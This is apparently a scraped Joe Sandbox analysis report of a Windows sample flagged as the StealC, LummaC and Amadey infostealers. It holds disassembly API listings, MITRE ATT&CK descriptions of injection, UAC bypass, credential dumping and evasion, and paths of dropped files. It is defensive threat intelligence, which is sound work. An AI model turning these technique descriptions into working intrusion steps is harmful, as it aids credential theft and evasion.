TlsGetValue.KERNEL32 ref: 6D560E84

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 8ab2672d9f310dae298b2e756de7ad5b5d1e2a10f9bab5b219872d9d49051621
Instruction ID: b36e574fcc96ee2366de107e9eb2aa10c67619a428d4b7aaeb03a5ae59ee8756
Opcode Fuzzy Hash: 8ab2672d9f310dae298b2e756de7ad5b5d1e2a10f9bab5b219872d9d49051621
Instruction Fuzzy Hash: 7631F4705543A2CBDB159F3FC88572977B4BF85384F028A6ED88987631DB348881CBA2

Function 6D560F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6D502AF5,?,?,?,?,?,6D500A1B,00000000), ref: 6D560F1A
malloc.MOZGLUE(00000001), ref: 6D560F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D560F42
TlsGetValue.KERNEL32 ref: 6D560F5B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 0dfb2ddc9e116474e6168d909ff3b93237a50939970e51960336c03424326b84
Instruction ID: 2d276cdf2e86ea3d2fa4b31ca2f6c972690ed059e4cca6ac5b19ddb12f83ef7f
Opcode Fuzzy Hash: 0dfb2ddc9e116474e6168d909ff3b93237a50939970e51960336c03424326b84
Instruction Fuzzy Hash: 7B0128B19142815BE711573F9C45A32BBACEF92295B020A26ED0DC2532EB31C845C2F2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\EHIIIJDA

C:\ProgramData\IIEBGIDAAFHIJJJJEGCG

C:\ProgramData\JKJDBAAAEHIEGCAKFHCG

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre